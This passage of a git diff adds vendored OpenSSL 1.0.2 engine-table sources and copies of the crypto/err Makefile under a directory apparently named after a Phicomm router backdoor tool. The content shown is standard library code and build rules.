+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+#include <openssl/evp.h>
+
+/*
+ * If this symbol is defined then ENGINE_get_pkey_meth_engine(), the function
+ * that is used by EVP to hook in pkey_meth code and cache defaults (etc),
+ * will display brief debugging summaries to stderr with the 'nid'.
+ */
+/* #define ENGINE_PKEY_METH_DEBUG */
+
+static ENGINE_TABLE *pkey_meth_table = NULL;
+
+void ENGINE_unregister_pkey_meths(ENGINE *e)
+{
+    engine_table_unregister(&pkey_meth_table, e);
+}
+
+static void engine_unregister_all_pkey_meths(void)
+{
+    engine_table_cleanup(&pkey_meth_table);
+}
+
+int ENGINE_register_pkey_meths(ENGINE *e)
+{
+    if (e->pkey_meths) {
+        const int *nids;
+        int num_nids = e->pkey_meths(e, NULL, &nids, 0);
+        if (num_nids > 0)
+            return engine_table_register(&pkey_meth_table,
+                                         engine_unregister_all_pkey_meths, e,
+                                         nids, num_nids, 0);
+    }
+    return 1;
+}
+
+void ENGINE_register_all_pkey_meths()
+{
+    ENGINE *e;
+
+    for (e = ENGINE_get_first(); e; e = ENGINE_get_next(e))
+        ENGINE_register_pkey_meths(e);
+}
+
+int ENGINE_set_default_pkey_meths(ENGINE *e)
+{
+    if (e->pkey_meths) {
+        const int *nids;
+        int num_nids = e->pkey_meths(e, NULL, &nids, 0);
+        if (num_nids > 0)
+            return engine_table_register(&pkey_meth_table,
+                                         engine_unregister_all_pkey_meths, e,
+                                         nids, num_nids, 1);
+    }
+    return 1;
+}
+
+/*
+ * Exposed API function to get a functional reference from the implementation
+ * table (ie. try to get a functional reference from the tabled structural
+ * references) for a given pkey_meth 'nid'
+ */
+ENGINE *ENGINE_get_pkey_meth_engine(int nid)
+{
+    return engine_table_select(&pkey_meth_table, nid);
+}
+
+/* Obtains a pkey_meth implementation from an ENGINE functional reference */
+const EVP_PKEY_METHOD *ENGINE_get_pkey_meth(ENGINE *e, int nid)
+{
+    EVP_PKEY_METHOD *ret;
+    ENGINE_PKEY_METHS_PTR fn = ENGINE_get_pkey_meths(e);
+    if (!fn || !fn(e, &ret, NULL, nid)) {
+        ENGINEerr(ENGINE_F_ENGINE_GET_PKEY_METH,
+                  ENGINE_R_UNIMPLEMENTED_PUBLIC_KEY_METHOD);
+        return NULL;
+    }
+    return ret;
+}
+
+/* Gets the pkey_meth callback from an ENGINE structure */
+ENGINE_PKEY_METHS_PTR ENGINE_get_pkey_meths(const ENGINE *e)
+{
+    return e->pkey_meths;
+}
+
+/* Sets the pkey_meth callback in an ENGINE structure */
+int ENGINE_set_pkey_meths(ENGINE *e, ENGINE_PKEY_METHS_PTR f)
+{
+    e->pkey_meths = f;
+    return 1;
+}
+
+/*
+ * Internal function to free up EVP_PKEY_METHOD structures before an ENGINE
+ * is destroyed
+ */
+
+void engine_pkey_meths_free(ENGINE *e)
+{
+    int i;
+    EVP_PKEY_METHOD *pkm;
+    if (e->pkey_meths) {
+        const int *pknids;
+        int npknids;
+        npknids = e->pkey_meths(e, NULL, &pknids, 0);
+        for (i = 0; i < npknids; i++) {
+            if (e->pkey_meths(e, &pkm, NULL, pknids[i])) {
+                EVP_PKEY_meth_free(pkm);
+            }
+        }
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_rand.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_rand.c
new file mode 100644
index 0000000..a522264
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_rand.c
@@ -0,0 +1,124 @@
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+
+/*
+ * If this symbol is defined then ENGINE_get_default_RAND(), the function
+ * that is used by RAND to hook in implementation code and cache defaults
+ * (etc), will display brief debugging summaries to stderr with the 'nid'.
+ */
+/* #define ENGINE_RAND_DEBUG */
+
+static ENGINE_TABLE *rand_table = NULL;
+static const int dummy_nid = 1;
+
+void ENGINE_unregister_RAND(ENGINE *e)
+{
+    engine_table_unregister(&rand_table, e);
+}
+
+static void engine_unregister_all_RAND(void)
+{
+    engine_table_cleanup(&rand_table);
+}
+
+int ENGINE_register_RAND(ENGINE *e)
+{
+    if (e->rand_meth)
+        return engine_table_register(&rand_table,
+                                     engine_unregister_all_RAND, e,
+                                     &dummy_nid, 1, 0);
+    return 1;
+}
+
+void ENGINE_register_all_RAND()
+{
+    ENGINE *e;
+
+    for (e = ENGINE_get_first(); e; e = ENGINE_get_next(e))
+        ENGINE_register_RAND(e);
+}
+
+int ENGINE_set_default_RAND(ENGINE *e)
+{
+    if (e->rand_meth)
+        return engine_table_register(&rand_table,
+                                     engine_unregister_all_RAND, e,
+                                     &dummy_nid, 1, 1);
+    return 1;
+}
+
+/*
+ * Exposed API function to get a functional reference from the implementation
+ * table (ie. try to get a functional reference from the tabled structural
+ * references).
+ */
+ENGINE *ENGINE_get_default_RAND(void)
+{
+    return engine_table_select(&rand_table, dummy_nid);
+}
+
+/* Obtains an RAND implementation from an ENGINE functional reference */
+const RAND_METHOD *ENGINE_get_RAND(const ENGINE *e)
+{
+    return e->rand_meth;
+}
+
+/* Sets an RAND implementation in an ENGINE structure */
+int ENGINE_set_RAND(ENGINE *e, const RAND_METHOD *rand_meth)
+{
+    e->rand_meth = rand_meth;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_rsa.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_rsa.c
new file mode 100644
index 0000000..2790a82
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_rsa.c
@@ -0,0 +1,124 @@
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+
+/*
+ * If this symbol is defined then ENGINE_get_default_RSA(), the function that
+ * is used by RSA to hook in implementation code and cache defaults (etc),
+ * will display brief debugging summaries to stderr with the 'nid'.
+ */
+/* #define ENGINE_RSA_DEBUG */
+
+static ENGINE_TABLE *rsa_table = NULL;
+static const int dummy_nid = 1;
+
+void ENGINE_unregister_RSA(ENGINE *e)
+{
+    engine_table_unregister(&rsa_table, e);
+}
+
+static void engine_unregister_all_RSA(void)
+{
+    engine_table_cleanup(&rsa_table);
+}
+
+int ENGINE_register_RSA(ENGINE *e)
+{
+    if (e->rsa_meth)
+        return engine_table_register(&rsa_table,
+                                     engine_unregister_all_RSA, e, &dummy_nid,
+                                     1, 0);
+    return 1;
+}
+
+void ENGINE_register_all_RSA()
+{
+    ENGINE *e;
+
+    for (e = ENGINE_get_first(); e; e = ENGINE_get_next(e))
+        ENGINE_register_RSA(e);
+}
+
+int ENGINE_set_default_RSA(ENGINE *e)
+{
+    if (e->rsa_meth)
+        return engine_table_register(&rsa_table,
+                                     engine_unregister_all_RSA, e, &dummy_nid,
+                                     1, 1);
+    return 1;
+}
+
+/*
+ * Exposed API function to get a functional reference from the implementation
+ * table (ie. try to get a functional reference from the tabled structural
+ * references).
+ */
+ENGINE *ENGINE_get_default_RSA(void)
+{
+    return engine_table_select(&rsa_table, dummy_nid);
+}
+
+/* Obtains an RSA implementation from an ENGINE functional reference */
+const RSA_METHOD *ENGINE_get_RSA(const ENGINE *e)
+{
+    return e->rsa_meth;
+}
+
+/* Sets an RSA implementation in an ENGINE structure */
+int ENGINE_set_RSA(ENGINE *e, const RSA_METHOD *rsa_meth)
+{
+    e->rsa_meth = rsa_meth;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_store.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_store.c
new file mode 100644
index 0000000..1eab49d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_store.c
@@ -0,0 +1,129 @@
+/* ====================================================================
+ * Copyright (c) 2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+
+/*
+ * If this symbol is defined then ENGINE_get_default_STORE(), the function
+ * that is used by STORE to hook in implementation code and cache defaults
+ * (etc), will display brief debugging summaries to stderr with the 'nid'.
+ */
+/* #define ENGINE_STORE_DEBUG */
+
+static ENGINE_TABLE *store_table = NULL;
+static const int dummy_nid = 1;
+
+void ENGINE_unregister_STORE(ENGINE *e)
+{
+    engine_table_unregister(&store_table, e);
+}
+
+static void engine_unregister_all_STORE(void)
+{
+    engine_table_cleanup(&store_table);
+}
+
+int ENGINE_register_STORE(ENGINE *e)
+{
+    if (e->store_meth)
+        return engine_table_register(&store_table,
+                                     engine_unregister_all_STORE, e,
+                                     &dummy_nid, 1, 0);
+    return 1;
+}
+
+void ENGINE_register_all_STORE()
+{
+    ENGINE *e;
+
+    for (e = ENGINE_get_first(); e; e = ENGINE_get_next(e))
+        ENGINE_register_STORE(e);
+}
+
+/* The following two functions are removed because they're useless. */
+#if 0
+int ENGINE_set_default_STORE(ENGINE *e)
+{
+    if (e->store_meth)
+        return engine_table_register(&store_table,
+                                     engine_unregister_all_STORE, e,
+                                     &dummy_nid, 1, 1);
+    return 1;
+}
+#endif
+
+#if 0
+/*
+ * Exposed API function to get a functional reference from the implementation
+ * table (ie. try to get a functional reference from the tabled structural
+ * references).
+ */
+ENGINE *ENGINE_get_default_STORE(void)
+{
+    return engine_table_select(&store_table, dummy_nid);
+}
+#endif
+
+/* Obtains an STORE implementation from an ENGINE functional reference */
+const STORE_METHOD *ENGINE_get_STORE(const ENGINE *e)
+{
+    return e->store_meth;
+}
+
+/* Sets an STORE implementation in an ENGINE structure */
+int ENGINE_set_STORE(ENGINE *e, const STORE_METHOD *store_meth)
+{
+    e->store_meth = store_meth;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/Makefile
new file mode 100644
index 0000000..269f1e0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/Makefile
@@ -0,0 +1,108 @@
+#
+# OpenSSL/crypto/err/Makefile
+#
+
+DIR=	err
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=err.c err_all.c err_prn.c
+LIBOBJ=err.o err_all.o err_prn.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= err.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+err.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/buffer.h
+err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+err.o: ../cryptlib.h err.c
+err_all.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+err_all.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+err_all.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+err_all.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+err_all.o: ../../include/openssl/dsa.h ../../include/openssl/dso.h
+err_all.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+err_all.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+err_all.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+err_all.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+err_all.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+err_all.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs12.h
+err_all.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+err_all.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+err_all.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+err_all.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+err_all.o: ../../include/openssl/ui.h ../../include/openssl/x509.h
+err_all.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+err_all.o: err_all.c
+err_prn.o: ../../e_os.h ../../include/openssl/bio.h
+err_prn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+err_prn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+err_prn.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+err_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+err_prn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+err_prn.o: ../../include/openssl/symhacks.h ../cryptlib.h err_prn.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/Makefile.bak
new file mode 100644
index 0000000..269f1e0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/Makefile.bak
@@ -0,0 +1,108 @@
+#
+# OpenSSL/crypto/err/Makefile
+#
+
+DIR=	err
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=err.c err_all.c err_prn.c
+LIBOBJ=err.o err_all.o err_prn.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= err.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+err.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/buffer.h
+err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+err.o: ../cryptlib.h err.c
+err_all.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+err_all.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+err_all.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+err_all.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+err_all.o: ../../include/openssl/dsa.h ../../include/openssl/dso.h
+err_all.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+err_all.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+err_all.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+err_all.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+err_all.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+err_all.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs12.h
+err_all.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+err_all.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+err_all.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+err_all.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+err_all.o: ../../include/openssl/ui.h ../../include/openssl/x509.h
+err_all.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+err_all.o: err_all.c
+err_prn.o: ../../e_os.h ../../include/openssl/bio.h
+err_prn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+err_prn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+err_prn.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+err_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+err_prn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+err_prn.o: ../../include/openssl/symhacks.h ../cryptlib.h err_prn.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/Makefile.save
new file mode 100644
index 0000000..269f1e0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/Makefile.save
@@ -0,0 +1,108 @@
+#
+# OpenSSL/crypto/err/Makefile
+#
+
+DIR=	err
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=err.c err_all.c err_prn.c
+LIBOBJ=err.o err_all.o err_prn.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= err.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
